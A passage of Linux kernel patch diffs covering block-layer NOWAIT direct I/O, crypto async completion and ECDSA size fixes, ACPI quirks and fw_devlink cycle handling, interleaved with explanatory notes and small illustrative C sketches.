+ 
+ 		if (nr_budgets)
+ 			blk_mq_release_budgets(q, list);
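
blk_mq_mark_tag_wait() now sleeps on the wait queue that matches the tag class being waited for: a request holding a reserved tag must wait on breserved_tags, or the wakeup when a reserved tag frees up would never reach it. Picking one of two queues by a predicate is all there is to it; a sketch with toy stand-ins for sbitmap_queue:

#include <stdbool.h>
#include <stdio.h>

struct wait_queue { const char *name; };

struct tag_set {
	struct wait_queue bitmap_tags;		/* normal tags */
	struct wait_queue breserved_tags;	/* reserved tags */
};

/* Wait on the queue that will actually be woken when a tag frees up. */
static struct wait_queue *wait_queue_for(struct tag_set *tags, bool reserved)
{
	return reserved ? &tags->breserved_tags : &tags->bitmap_tags;
}

int main(void)
{
	struct tag_set tags = {
		.bitmap_tags	= { "bitmap_tags" },
		.breserved_tags	= { "breserved_tags" },
	};

	printf("%s\n", wait_queue_for(&tags, true)->name);
	printf("%s\n", wait_queue_for(&tags, false)->name);
	return 0;
}
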
+diff --git a/block/fops.c b/block/fops.c
+index b90742595317e..e406aa605327e 100644
+--- a/block/fops.c
++++ b/block/fops.c
+@@ -221,6 +221,24 @@ static ssize_t __blkdev_direct_IO(struct kiocb *iocb, struct iov_iter *iter,
+ 			bio_endio(bio);
+ 			break;
+ 		}
++		if (iocb->ki_flags & IOCB_NOWAIT) {
++			/*
++			 * This is nonblocking IO, and we need to allocate
++			 * another bio if we have data left to map. As we
++			 * cannot guarantee that none of the sub bios will fail
++			 * to be issued with NOWAIT, and as error results are
++			 * coalesced across all of them, be safe and ask for a
++			 * retry of this from blocking context.
++			 */
++			if (unlikely(iov_iter_count(iter))) {
++				bio_release_pages(bio, false);
++				bio_clear_flag(bio, BIO_REFFED);
++				bio_put(bio);
++				blk_finish_plug(&plug);
++				return -EAGAIN;
++			}
++			bio->bi_opf |= REQ_NOWAIT;
++		}
+ 
+ 		if (is_read) {
+ 			if (dio->flags & DIO_SHOULD_DIRTY)
+@@ -228,9 +246,6 @@ static ssize_t __blkdev_direct_IO(struct kiocb *iocb, struct iov_iter *iter,
+ 		} else {
+ 			task_io_account_write(bio->bi_iter.bi_size);
+ 		}
+-		if (iocb->ki_flags & IOCB_NOWAIT)
+-			bio->bi_opf |= REQ_NOWAIT;
+-
+ 		dio->size += bio->bi_iter.bi_size;
+ 		pos += bio->bi_iter.bi_size;
+ 
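
The fops.c change moves the IOCB_NOWAIT decision to the point where a second bio would be needed: once a nonblocking direct I/O spans multiple bios, a later sub-bio could fail to issue while earlier ones succeed, and the coalesced error would be ambiguous, so the whole request is punted back with -EAGAIN for a blocking retry. The control flow reduced to a loop, with made-up sizes:

#include <errno.h>
#include <stdio.h>

#define BIO_MAX_BYTES 1024	/* toy per-bio capacity */

/* Returns bytes submitted, or -EAGAIN if nonblocking I/O needs >1 bio. */
static long submit_dio(long remaining, int nowait)
{
	long submitted = 0;

	for (;;) {
		long chunk = remaining < BIO_MAX_BYTES ?
			     remaining : BIO_MAX_BYTES;

		remaining -= chunk;
		if (!remaining)
			return submitted + chunk; /* last bio: always fine */
		if (nowait)
			return -EAGAIN;		/* needs another bio: punt */
		submitted += chunk;		/* blocking path continues */
	}
}

int main(void)
{
	printf("%ld\n", submit_dio(512, 1));	/* 512: one bio suffices */
	printf("%ld\n", submit_dio(4096, 1));	/* -EAGAIN (-11) */
	printf("%ld\n", submit_dio(4096, 0));	/* 4096 */
	return 0;
}
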
+diff --git a/crypto/asymmetric_keys/public_key.c b/crypto/asymmetric_keys/public_key.c
+index 2f8352e888602..eca5671ad3f22 100644
+--- a/crypto/asymmetric_keys/public_key.c
++++ b/crypto/asymmetric_keys/public_key.c
+@@ -186,8 +186,28 @@ static int software_key_query(const struct kernel_pkey_params *params,
+ 
+ 	len = crypto_akcipher_maxsize(tfm);
+ 	info->key_size = len * 8;
+-	info->max_data_size = len;
+-	info->max_sig_size = len;
++
++	if (strncmp(pkey->pkey_algo, "ecdsa", 5) == 0) {
++		/*
++		 * ECDSA key sizes are much smaller than RSA, and thus could
++		 * operate on (hashed) inputs that are larger than key size.
++		 * For example SHA384-hashed input used with secp256r1
++		 * based keys.  Set max_data_size to be at least as large as
++		 * the largest supported hash size (SHA512)
++		 */
++		info->max_data_size = 64;
++
++		/*
++		 * Verify takes ECDSA-Sig (described in RFC 5480) as input,
++		 * which is actually 2 'key_size'-bit integers encoded in
++		 * ASN.1.  Account for the ASN.1 encoding overhead here.
++		 */
++		info->max_sig_size = 2 * (len + 3) + 2;
++	} else {
++		info->max_data_size = len;
++		info->max_sig_size = len;
++	}
++
+ 	info->max_enc_size = len;
+ 	info->max_dec_size = len;
+ 	info->supported_ops = (KEYCTL_SUPPORTS_ENCRYPT |
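
The 2 * (len + 3) + 2 bound for ECDSA follows from the DER encoding of ECDSA-Sig-Value: each of the two key_size-bit integers needs a tag byte, a length byte and up to one leading zero byte on top of its len value bytes, and the enclosing SEQUENCE adds two more header bytes. The arithmetic worked out in a few lines; this mirrors the size formula only, not the kernel's ASN.1 code:

#include <stdio.h>

/*
 * ECDSA-Sig-Value ::= SEQUENCE { r INTEGER, s INTEGER }
 *
 * Each INTEGER: 1 tag byte + 1 length byte + up to (len + 1) value
 * bytes, the +1 being a leading 0x00 when the high bit is set.  The
 * SEQUENCE wrapper adds one more tag byte and one more length byte.
 */
static unsigned int ecdsa_max_sig_size(unsigned int len)
{
	return 2 * (len + 3) + 2;
}

int main(void)
{
	/* secp256r1: 32-byte integers give at most 72 signature bytes. */
	printf("%u\n", ecdsa_max_sig_size(32));	/* 72 */
	return 0;
}
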
+diff --git a/crypto/essiv.c b/crypto/essiv.c
+index e33369df90344..307eba74b901e 100644
+--- a/crypto/essiv.c
++++ b/crypto/essiv.c
+@@ -171,7 +171,12 @@ static void essiv_aead_done(struct crypto_async_request *areq, int err)
+ 	struct aead_request *req = areq->data;
+ 	struct essiv_aead_request_ctx *rctx = aead_request_ctx(req);
+ 
++	if (err == -EINPROGRESS)
++		goto out;
++
+ 	kfree(rctx->assoc);
++
++out:
+ 	aead_request_complete(req, err);
+ }
+ 
+@@ -247,7 +252,7 @@ static int essiv_aead_crypt(struct aead_request *req, bool enc)
+ 	err = enc ? crypto_aead_encrypt(subreq) :
+ 		    crypto_aead_decrypt(subreq);
+ 
+-	if (rctx->assoc && err != -EINPROGRESS)
++	if (rctx->assoc && err != -EINPROGRESS && err != -EBUSY)
+ 		kfree(rctx->assoc);
+ 	return err;
+ }
+diff --git a/crypto/rsa-pkcs1pad.c b/crypto/rsa-pkcs1pad.c
+index 3285e3af43e14..3237b50baf3c5 100644
+--- a/crypto/rsa-pkcs1pad.c
++++ b/crypto/rsa-pkcs1pad.c
+@@ -214,16 +214,14 @@ static void pkcs1pad_encrypt_sign_complete_cb(
+ 		struct crypto_async_request *child_async_req, int err)
+ {
+ 	struct akcipher_request *req = child_async_req->data;
+-	struct crypto_async_request async_req;
+ 
+ 	if (err == -EINPROGRESS)
+-		return;
++		goto out;
++
++	err = pkcs1pad_encrypt_sign_complete(req, err);
+ 
+-	async_req.data = req->base.data;
+-	async_req.tfm = crypto_akcipher_tfm(crypto_akcipher_reqtfm(req));
+-	async_req.flags = child_async_req->flags;
+-	req->base.complete(&async_req,
+-			pkcs1pad_encrypt_sign_complete(req, err));
++out:
++	akcipher_request_complete(req, err);
+ }
+ 
+ static int pkcs1pad_encrypt(struct akcipher_request *req)
+@@ -332,15 +330,14 @@ static void pkcs1pad_decrypt_complete_cb(
+ 		struct crypto_async_request *child_async_req, int err)
+ {
+ 	struct akcipher_request *req = child_async_req->data;
+-	struct crypto_async_request async_req;
+ 
+ 	if (err == -EINPROGRESS)
+-		return;
++		goto out;
++
++	err = pkcs1pad_decrypt_complete(req, err);
+ 
+-	async_req.data = req->base.data;
+-	async_req.tfm = crypto_akcipher_tfm(crypto_akcipher_reqtfm(req));
+-	async_req.flags = child_async_req->flags;
+-	req->base.complete(&async_req, pkcs1pad_decrypt_complete(req, err));
++out:
++	akcipher_request_complete(req, err);
+ }
+ 
+ static int pkcs1pad_decrypt(struct akcipher_request *req)
+@@ -513,15 +510,14 @@ static void pkcs1pad_verify_complete_cb(
+ 		struct crypto_async_request *child_async_req, int err)
+ {
+ 	struct akcipher_request *req = child_async_req->data;
+-	struct crypto_async_request async_req;
+ 
+ 	if (err == -EINPROGRESS)
+-		return;
++		goto out;
+ 
+-	async_req.data = req->base.data;
+-	async_req.tfm = crypto_akcipher_tfm(crypto_akcipher_reqtfm(req));
+-	async_req.flags = child_async_req->flags;
+-	req->base.complete(&async_req, pkcs1pad_verify_complete(req, err));
++	err = pkcs1pad_verify_complete(req, err);
++
++out:
++	akcipher_request_complete(req, err);
+ }
+ 
+ /*
+diff --git a/crypto/seqiv.c b/crypto/seqiv.c
+index 0899d527c2845..b1bcfe537daf1 100644
+--- a/crypto/seqiv.c
++++ b/crypto/seqiv.c
+@@ -23,7 +23,7 @@ static void seqiv_aead_encrypt_complete2(struct aead_request *req, int err)
+ 	struct aead_request *subreq = aead_request_ctx(req);
+ 	struct crypto_aead *geniv;
+ 
+-	if (err == -EINPROGRESS)
++	if (err == -EINPROGRESS || err == -EBUSY)
+ 		return;
+ 
+ 	if (err)
+diff --git a/crypto/xts.c b/crypto/xts.c
+index 63c85b9e64e08..de6cbcf69bbd6 100644
+--- a/crypto/xts.c
++++ b/crypto/xts.c
+@@ -203,12 +203,12 @@ static void xts_encrypt_done(struct crypto_async_request *areq, int err)
+ 	if (!err) {
+ 		struct xts_request_ctx *rctx = skcipher_request_ctx(req);
+ 
+-		rctx->subreq.base.flags &= ~CRYPTO_TFM_REQ_MAY_SLEEP;
++		rctx->subreq.base.flags &= CRYPTO_TFM_REQ_MAY_BACKLOG;
+ 		err = xts_xor_tweak_post(req, true);
+ 
+ 		if (!err && unlikely(req->cryptlen % XTS_BLOCK_SIZE)) {
+ 			err = xts_cts_final(req, crypto_skcipher_encrypt);
+-			if (err == -EINPROGRESS)
++			if (err == -EINPROGRESS || err == -EBUSY)
+ 				return;
+ 		}
+ 	}
+@@ -223,12 +223,12 @@ static void xts_decrypt_done(struct crypto_async_request *areq, int err)
+ 	if (!err) {
+ 		struct xts_request_ctx *rctx = skcipher_request_ctx(req);
+ 
+-		rctx->subreq.base.flags &= ~CRYPTO_TFM_REQ_MAY_SLEEP;
++		rctx->subreq.base.flags &= CRYPTO_TFM_REQ_MAY_BACKLOG;
+ 		err = xts_xor_tweak_post(req, false);
+ 
+ 		if (!err && unlikely(req->cryptlen % XTS_BLOCK_SIZE)) {
+ 			err = xts_cts_final(req, crypto_skcipher_decrypt);
+-			if (err == -EINPROGRESS)
++			if (err == -EINPROGRESS || err == -EBUSY)
+ 				return;
+ 		}
+ 	}
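
The crypto fixes above all enforce one rule: a request queued with MAY_BACKLOG can be signalled with -EBUSY (accepted into the backlog) or -EINPROGRESS (moved to the hardware queue) before its real completion arrives, so neither the synchronous return value nor the callback may treat those codes as final or free per-request state on them. The callback skeleton, as a hedged sketch with invented structures:

#include <errno.h>
#include <stdio.h>
#include <stdlib.h>

struct req { void *assoc; };

static void complete_parent(struct req *r, int err)
{
	printf("parent completed, err=%d\n", err);
}

/* Completion notification: ignore the "still in flight" codes. */
static void crypt_done(struct req *r, int err)
{
	if (err == -EINPROGRESS || err == -EBUSY)
		return;			/* not final: keep resources alive */

	free(r->assoc);			/* final completion: safe to clean up */
	r->assoc = NULL;
	complete_parent(r, err);
}

int main(void)
{
	struct req r = { .assoc = malloc(16) };

	crypt_done(&r, -EBUSY);		/* backlogged: nothing freed */
	crypt_done(&r, 0);		/* real completion */
	return 0;
}
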
+diff --git a/drivers/acpi/acpica/Makefile b/drivers/acpi/acpica/Makefile
+index 59700433a96e5..f919811156b1f 100644
+--- a/drivers/acpi/acpica/Makefile
++++ b/drivers/acpi/acpica/Makefile
+@@ -3,7 +3,7 @@
+ # Makefile for ACPICA Core interpreter
+ #
+ 
+-ccflags-y			:= -Os -D_LINUX -DBUILDING_ACPICA
++ccflags-y			:= -D_LINUX -DBUILDING_ACPICA
+ ccflags-$(CONFIG_ACPI_DEBUG)	+= -DACPI_DEBUG_OUTPUT
+ 
+ # use acpi.o to put all files here into acpi.o modparam namespace
+diff --git a/drivers/acpi/acpica/hwvalid.c b/drivers/acpi/acpica/hwvalid.c
+index 915b26448d2c9..0d392e7b0747b 100644
+--- a/drivers/acpi/acpica/hwvalid.c
++++ b/drivers/acpi/acpica/hwvalid.c
+@@ -23,8 +23,8 @@ acpi_hw_validate_io_request(acpi_io_address address, u32 bit_width);
+  *
+  * The table is used to implement the Microsoft port access rules that
+  * first appeared in Windows XP. Some ports are always illegal, and some
+- * ports are only illegal if the BIOS calls _OSI with a win_XP string or
+- * later (meaning that the BIOS itelf is post-XP.)
++ * ports are only illegal if the BIOS calls _OSI with nothing newer than
++ * the specific _OSI strings.
+  *
+  * This provides ACPICA with the desired port protections and
+  * Microsoft compatibility.
+@@ -145,7 +145,8 @@ acpi_hw_validate_io_request(acpi_io_address address, u32 bit_width)
+ 
+ 			/* Port illegality may depend on the _OSI calls made by the BIOS */
+ 
+-			if (acpi_gbl_osi_data >= port_info->osi_dependency) {
++			if (port_info->osi_dependency == ACPI_ALWAYS_ILLEGAL ||
++			    acpi_gbl_osi_data == port_info->osi_dependency) {
+ 				ACPI_DEBUG_PRINT((ACPI_DB_VALUES,
+ 						  "Denied AML access to port 0x%8.8X%8.8X/%X (%s 0x%.4X-0x%.4X)\n",
+ 						  ACPI_FORMAT_UINT64(address),
+diff --git a/drivers/acpi/acpica/nsrepair.c b/drivers/acpi/acpica/nsrepair.c
+index 367fcd201f96e..ec512e06a48ed 100644
+--- a/drivers/acpi/acpica/nsrepair.c
++++ b/drivers/acpi/acpica/nsrepair.c
+@@ -181,8 +181,9 @@ acpi_ns_simple_repair(struct acpi_evaluate_info *info,
+ 	 * Try to fix if there was no return object. Warning if failed to fix.
+ 	 */
+ 	if (!return_object) {
+-		if (expected_btypes && (!(expected_btypes & ACPI_RTYPE_NONE))) {
+-			if (package_index != ACPI_NOT_PACKAGE_ELEMENT) {
++		if (expected_btypes) {
++			if (!(expected_btypes & ACPI_RTYPE_NONE) &&
++			    package_index != ACPI_NOT_PACKAGE_ELEMENT) {
+ 				ACPI_WARN_PREDEFINED((AE_INFO,
+ 						      info->full_pathname,
+ 						      ACPI_WARN_ALWAYS,
+@@ -196,14 +197,15 @@ acpi_ns_simple_repair(struct acpi_evaluate_info *info,
+ 				if (ACPI_SUCCESS(status)) {
+ 					return (AE_OK);	/* Repair was successful */
+ 				}
+-			} else {
++			}
++
++			if (expected_btypes != ACPI_RTYPE_NONE) {
+ 				ACPI_WARN_PREDEFINED((AE_INFO,
+ 						      info->full_pathname,
+ 						      ACPI_WARN_ALWAYS,
+ 						      "Missing expected return value"));
++				return (AE_AML_NO_RETURN_VALUE);
+ 			}
+-
+-			return (AE_AML_NO_RETURN_VALUE);
+ 		}
+ 	}
+ 
+diff --git a/drivers/acpi/battery.c b/drivers/acpi/battery.c
+index 306513fec1e1f..084f156bdfbc4 100644
+--- a/drivers/acpi/battery.c
++++ b/drivers/acpi/battery.c
+@@ -440,7 +440,7 @@ static int extract_package(struct acpi_battery *battery,
+ 
+ 			if (element->type == ACPI_TYPE_STRING ||
+ 			    element->type == ACPI_TYPE_BUFFER)
+-				strncpy(ptr, element->string.pointer, 32);
++				strscpy(ptr, element->string.pointer, 32);
+ 			else if (element->type == ACPI_TYPE_INTEGER) {
+ 				strncpy(ptr, (u8 *)&element->integer.value,
+ 					sizeof(u64));
+diff --git a/drivers/acpi/resource.c b/drivers/acpi/resource.c
+index 192d1784e409b..a222bda7e15b0 100644
+--- a/drivers/acpi/resource.c
++++ b/drivers/acpi/resource.c
+@@ -467,17 +467,34 @@ static const struct dmi_system_id lenovo_laptop[] = {
+ 	{ }
+ };
+ 
+-static const struct dmi_system_id schenker_gm_rg[] = {
++static const struct dmi_system_id tongfang_gm_rg[] = {
+ 	{
+-		.ident = "XMG CORE 15 (M22)",
++		.ident = "TongFang GMxRGxx/XMG CORE 15 (M22)/TUXEDO Stellaris 15 Gen4 AMD",
+ 		.matches = {
+-			DMI_MATCH(DMI_SYS_VENDOR, "SchenkerTechnologiesGmbH"),
+ 			DMI_MATCH(DMI_BOARD_NAME, "GMxRGxx"),
+ 		},
+ 	},
+ 	{ }
+ };
+ 
++static const struct dmi_system_id maingear_laptop[] = {
++	{
++		.ident = "MAINGEAR Vector Pro 2 15",
++		.matches = {
++			DMI_MATCH(DMI_SYS_VENDOR, "Micro Electronics Inc"),
++			DMI_MATCH(DMI_PRODUCT_NAME, "MG-VCP2-15A3070T"),
++		}
++	},
++	{
++		.ident = "MAINGEAR Vector Pro 2 17",
++		.matches = {
++			DMI_MATCH(DMI_SYS_VENDOR, "Micro Electronics Inc"),
++			DMI_MATCH(DMI_PRODUCT_NAME, "MG-VCP2-17A3070T"),
++		},
++	},
++	{ }
++};
++
+ struct irq_override_cmp {
+ 	const struct dmi_system_id *system;
+ 	unsigned char irq;
+@@ -492,7 +509,8 @@ static const struct irq_override_cmp override_table[] = {
+ 	{ asus_laptop, 1, ACPI_LEVEL_SENSITIVE, ACPI_ACTIVE_LOW, 0, false },
+ 	{ lenovo_laptop, 6, ACPI_LEVEL_SENSITIVE, ACPI_ACTIVE_LOW, 0, true },
+ 	{ lenovo_laptop, 10, ACPI_LEVEL_SENSITIVE, ACPI_ACTIVE_LOW, 0, true },
+-	{ schenker_gm_rg, 1, ACPI_EDGE_SENSITIVE, ACPI_ACTIVE_LOW, 1, true },
++	{ tongfang_gm_rg, 1, ACPI_EDGE_SENSITIVE, ACPI_ACTIVE_LOW, 1, true },
++	{ maingear_laptop, 1, ACPI_EDGE_SENSITIVE, ACPI_ACTIVE_LOW, 1, true },
+ };
+ 
+ static bool acpi_dev_irq_override(u32 gsi, u8 triggering, u8 polarity,
+diff --git a/drivers/acpi/video_detect.c b/drivers/acpi/video_detect.c
+index b48f85c3791e9..7f0ed845cd6ad 100644
+--- a/drivers/acpi/video_detect.c
++++ b/drivers/acpi/video_detect.c
+@@ -432,7 +432,7 @@ static const struct dmi_system_id video_detect_dmi_table[] = {
+ 	 /* Lenovo Ideapad Z570 */
+ 	 .matches = {
+ 		DMI_MATCH(DMI_SYS_VENDOR, "LENOVO"),
+-		DMI_MATCH(DMI_PRODUCT_NAME, "102434U"),
++		DMI_MATCH(DMI_PRODUCT_VERSION, "Ideapad Z570"),
+ 		},
+ 	},
+ 	{
+diff --git a/drivers/ata/ahci.c b/drivers/ata/ahci.c
+index 17bb0d8158ca0..53ab2306da009 100644
+--- a/drivers/ata/ahci.c
++++ b/drivers/ata/ahci.c
+@@ -422,7 +422,6 @@ static const struct pci_device_id ahci_pci_tbl[] = {
+ 	{ PCI_VDEVICE(INTEL, 0x34d3), board_ahci_low_power }, /* Ice Lake LP AHCI */
+ 	{ PCI_VDEVICE(INTEL, 0x02d3), board_ahci_low_power }, /* Comet Lake PCH-U AHCI */
+ 	{ PCI_VDEVICE(INTEL, 0x02d7), board_ahci_low_power }, /* Comet Lake PCH RAID */
+-	{ PCI_VDEVICE(INTEL, 0xa0d3), board_ahci_low_power }, /* Tiger Lake UP{3,4} AHCI */
+ 
+ 	/* JMicron 360/1/3/5/6, match class to avoid IDE function */
+ 	{ PCI_VENDOR_ID_JMICRON, PCI_ANY_ID, PCI_ANY_ID, PCI_ANY_ID,
+diff --git a/drivers/base/core.c b/drivers/base/core.c
+index d02501933467d..e30223c2672fc 100644
+--- a/drivers/base/core.c
++++ b/drivers/base/core.c
+@@ -53,11 +53,12 @@ static LIST_HEAD(deferred_sync);
+ static unsigned int defer_sync_state_count = 1;
+ static DEFINE_MUTEX(fwnode_link_lock);
+ static bool fw_devlink_is_permissive(void);
++static void __fw_devlink_link_to_consumers(struct device *dev);
+ static bool fw_devlink_drv_reg_done;
+ static bool fw_devlink_best_effort;
+ 
+ /**
+- * fwnode_link_add - Create a link between two fwnode_handles.
++ * __fwnode_link_add - Create a link between two fwnode_handles.
+  * @con: Consumer end of the link.
+  * @sup: Supplier end of the link.
+  *
+@@ -73,35 +74,42 @@ static bool fw_devlink_best_effort;
+  * Attempts to create duplicate links between the same pair of fwnode handles
+  * are ignored and there is no reference counting.
+  */
+-int fwnode_link_add(struct fwnode_handle *con, struct fwnode_handle *sup)
++static int __fwnode_link_add(struct fwnode_handle *con,
++			     struct fwnode_handle *sup, u8 flags)
+ {
+ 	struct fwnode_link *link;
+-	int ret = 0;
+-
+-	mutex_lock(&fwnode_link_lock);
+ 
+ 	list_for_each_entry(link, &sup->consumers, s_hook)
+-		if (link->consumer == con)
+-			goto out;
++		if (link->consumer == con) {
++			link->flags |= flags;
++			return 0;
++		}
+ 
+ 	link = kzalloc(sizeof(*link), GFP_KERNEL);
+-	if (!link) {
+-		ret = -ENOMEM;
+-		goto out;
+-	}
++	if (!link)
++		return -ENOMEM;
+ 
+ 	link->supplier = sup;
+ 	INIT_LIST_HEAD(&link->s_hook);
+ 	link->consumer = con;
+ 	INIT_LIST_HEAD(&link->c_hook);
++	link->flags = flags;
+ 
+ 	list_add(&link->s_hook, &sup->consumers);
+ 	list_add(&link->c_hook, &con->suppliers);
+ 	pr_debug("%pfwP Linked as a fwnode consumer to %pfwP\n",
+ 		 con, sup);
+-out:
+-	mutex_unlock(&fwnode_link_lock);
+ 
++	return 0;
++}
++
++int fwnode_link_add(struct fwnode_handle *con, struct fwnode_handle *sup)
++{
++	int ret;
++
++	mutex_lock(&fwnode_link_lock);
++	ret = __fwnode_link_add(con, sup, 0);
++	mutex_unlock(&fwnode_link_lock);
+ 	return ret;
+ }
+ 
+@@ -120,6 +128,19 @@ static void __fwnode_link_del(struct fwnode_link *link)
+ 	kfree(link);
+ }
+ 
++/**
++ * __fwnode_link_cycle - Mark a fwnode link as being part of a cycle.
++ * @link: the fwnode_link to be marked
++ *
++ * The fwnode_link_lock needs to be held when this function is called.
++ */
++static void __fwnode_link_cycle(struct fwnode_link *link)
++{
++	pr_debug("%pfwf: Relaxing link with %pfwf\n",
++		 link->consumer, link->supplier);
++	link->flags |= FWLINK_FLAG_CYCLE;
++}
++
+ /**
+  * fwnode_links_purge_suppliers - Delete all supplier links of fwnode_handle.
+  * @fwnode: fwnode whose supplier links need to be deleted
+@@ -180,6 +201,51 @@ void fw_devlink_purge_absent_suppliers(struct fwnode_handle *fwnode)
+ }
+ EXPORT_SYMBOL_GPL(fw_devlink_purge_absent_suppliers);
+ 
++/**
++ * __fwnode_links_move_consumers - Move consumer from @from to @to fwnode_handle
++ * @from: move consumers away from this fwnode
++ * @to: move consumers to this fwnode
++ *
++ * Move all consumer links from @from fwnode to @to fwnode.
++ */
++static void __fwnode_links_move_consumers(struct fwnode_handle *from,
++					  struct fwnode_handle *to)
++{
++	struct fwnode_link *link, *tmp;
++
++	list_for_each_entry_safe(link, tmp, &from->consumers, s_hook) {
++		__fwnode_link_add(link->consumer, to, link->flags);
++		__fwnode_link_del(link);
++	}
++}
++
++/**
++ * __fw_devlink_pickup_dangling_consumers - Pick up dangling consumers
++ * @fwnode: fwnode from which to pick up dangling consumers
++ * @new_sup: fwnode of new supplier
++ *
++ * If the @fwnode has a corresponding struct device and the device supports
++ * probing (that is, added to a bus), then we want to let fw_devlink create
++ * MANAGED device links to this device, so leave @fwnode and its descendant's
++ * fwnode links alone.
++ *
++ * Otherwise, move its consumers to the new supplier @new_sup.
++ */
++static void __fw_devlink_pickup_dangling_consumers(struct fwnode_handle *fwnode,
++						   struct fwnode_handle *new_sup)
++{
++	struct fwnode_handle *child;
++
++	if (fwnode->dev && fwnode->dev->bus)
++		return;
++
++	fwnode->flags |= FWNODE_FLAG_NOT_DEVICE;
++	__fwnode_links_move_consumers(fwnode, new_sup);
++
++	fwnode_for_each_available_child_node(fwnode, child)
++		__fw_devlink_pickup_dangling_consumers(child, new_sup);
++}
++
+ #ifdef CONFIG_SRCU
+ static DEFINE_MUTEX(device_links_lock);
+ DEFINE_STATIC_SRCU(device_links_srcu);
+@@ -271,6 +337,12 @@ static bool device_is_ancestor(struct device *dev, struct device *target)
+ 	return false;
+ }
+ 
++static inline bool device_link_flag_is_sync_state_only(u32 flags)
++{
++	return (flags & ~(DL_FLAG_INFERRED | DL_FLAG_CYCLE)) ==
++		(DL_FLAG_SYNC_STATE_ONLY | DL_FLAG_MANAGED);
++}
++
+ /**
+  * device_is_dependent - Check if one device depends on another one
+  * @dev: Device to check dependencies for.
+@@ -297,8 +369,7 @@ int device_is_dependent(struct device *dev, void *target)
+ 		return ret;
+ 
+ 	list_for_each_entry(link, &dev->links.consumers, s_node) {
+-		if ((link->flags & ~DL_FLAG_INFERRED) ==
+-		    (DL_FLAG_SYNC_STATE_ONLY | DL_FLAG_MANAGED))
++		if (device_link_flag_is_sync_state_only(link->flags))
+ 			continue;
+ 
+ 		if (link->consumer == target)
+@@ -371,8 +442,7 @@ static int device_reorder_to_tail(struct device *dev, void *not_used)
+ 
+ 	device_for_each_child(dev, NULL, device_reorder_to_tail);
+ 	list_for_each_entry(link, &dev->links.consumers, s_node) {
+-		if ((link->flags & ~DL_FLAG_INFERRED) ==
+-		    (DL_FLAG_SYNC_STATE_ONLY | DL_FLAG_MANAGED))
++		if (device_link_flag_is_sync_state_only(link->flags))
+ 			continue;
+ 		device_reorder_to_tail(link->consumer, NULL);
+ 	}
+@@ -633,7 +703,8 @@ postcore_initcall(devlink_class_init);
+ 			       DL_FLAG_AUTOREMOVE_SUPPLIER | \
+ 			       DL_FLAG_AUTOPROBE_CONSUMER  | \
+ 			       DL_FLAG_SYNC_STATE_ONLY | \
+-			       DL_FLAG_INFERRED)
++			       DL_FLAG_INFERRED | \
++			       DL_FLAG_CYCLE)
+ 
+ #define DL_ADD_VALID_FLAGS (DL_MANAGED_LINK_FLAGS | DL_FLAG_STATELESS | \
+ 			    DL_FLAG_PM_RUNTIME | DL_FLAG_RPM_ACTIVE)
+@@ -702,8 +773,6 @@ struct device_link *device_link_add(struct device *consumer,
+ 	if (!consumer || !supplier || consumer == supplier ||
+ 	    flags & ~DL_ADD_VALID_FLAGS ||
+ 	    (flags & DL_FLAG_STATELESS && flags & DL_MANAGED_LINK_FLAGS) ||
+-	    (flags & DL_FLAG_SYNC_STATE_ONLY &&
+-	     (flags & ~DL_FLAG_INFERRED) != DL_FLAG_SYNC_STATE_ONLY) ||
+ 	    (flags & DL_FLAG_AUTOPROBE_CONSUMER &&
+ 	     flags & (DL_FLAG_AUTOREMOVE_CONSUMER |
+ 		      DL_FLAG_AUTOREMOVE_SUPPLIER)))
+@@ -719,6 +788,10 @@ struct device_link *device_link_add(struct device *consumer,
+ 	if (!(flags & DL_FLAG_STATELESS))
+ 		flags |= DL_FLAG_MANAGED;
+ 
++	if (flags & DL_FLAG_SYNC_STATE_ONLY &&
++	    !device_link_flag_is_sync_state_only(flags))
++		return NULL;
++
+ 	device_links_write_lock();
+ 	device_pm_lock();
+ 
+@@ -983,6 +1056,21 @@ static bool dev_is_best_effort(struct device *dev)
+ 		(dev->fwnode && (dev->fwnode->flags & FWNODE_FLAG_BEST_EFFORT));
+ }
+ 
++static struct fwnode_handle *fwnode_links_check_suppliers(
++						struct fwnode_handle *fwnode)
++{
++	struct fwnode_link *link;
++
++	if (!fwnode || fw_devlink_is_permissive())
++		return NULL;
++
++	list_for_each_entry(link, &fwnode->suppliers, c_hook)
++		if (!(link->flags & FWLINK_FLAG_CYCLE))
++			return link->supplier;
++
++	return NULL;
++}
++
+ /**
+  * device_links_check_suppliers - Check presence of supplier drivers.
+  * @dev: Consumer device.
+@@ -1010,11 +1098,8 @@ int device_links_check_suppliers(struct device *dev)
+ 	 * probe.
+ 	 */
+ 	mutex_lock(&fwnode_link_lock);
+-	if (dev->fwnode && !list_empty(&dev->fwnode->suppliers) &&
+-	    !fw_devlink_is_permissive()) {
+-		sup_fw = list_first_entry(&dev->fwnode->suppliers,
+-					  struct fwnode_link,
+-					  c_hook)->supplier;
++	sup_fw = fwnode_links_check_suppliers(dev->fwnode);
++	if (sup_fw) {
+ 		if (!dev_is_best_effort(dev)) {
+ 			fwnode_ret = -EPROBE_DEFER;
+ 			dev_err_probe(dev, -EPROBE_DEFER,
+@@ -1203,7 +1288,9 @@ static ssize_t waiting_for_supplier_show(struct device *dev,
+ 	bool val;
+ 
+ 	device_lock(dev);
+-	val = !list_empty(&dev->fwnode->suppliers);
++	mutex_lock(&fwnode_link_lock);
++	val = !!fwnode_links_check_suppliers(dev->fwnode);
++	mutex_unlock(&fwnode_link_lock);
+ 	device_unlock(dev);
+ 	return sysfs_emit(buf, "%u\n", val);
+ }
+@@ -1266,16 +1353,23 @@ void device_links_driver_bound(struct device *dev)
+ 	 * them. So, fw_devlink no longer needs to create device links to any
+ 	 * of the device's suppliers.
+ 	 *
+-	 * Also, if a child firmware node of this bound device is not added as
+-	 * a device by now, assume it is never going to be added and make sure
+-	 * other devices don't defer probe indefinitely by waiting for such a
+-	 * child device.
++	 * Also, if a child firmware node of this bound device is not added as a
++	 * device by now, assume it is never going to be added. Make this bound
++	 * device the fallback supplier to the dangling consumers of the child
++	 * firmware node because this bound device is probably implementing the
++	 * child firmware node functionality and we don't want the dangling
++	 * consumers to defer probe indefinitely waiting for a device for the
++	 * child firmware node.
+ 	 */
+ 	if (dev->fwnode && dev->fwnode->dev == dev) {
+ 		struct fwnode_handle *child;
+ 		fwnode_links_purge_suppliers(dev->fwnode);
++		mutex_lock(&fwnode_link_lock);
+ 		fwnode_for_each_available_child_node(dev->fwnode, child)
+-			fw_devlink_purge_absent_suppliers(child);
++			__fw_devlink_pickup_dangling_consumers(child,
++							       dev->fwnode);
++		__fw_devlink_link_to_consumers(dev);
++		mutex_unlock(&fwnode_link_lock);
+ 	}
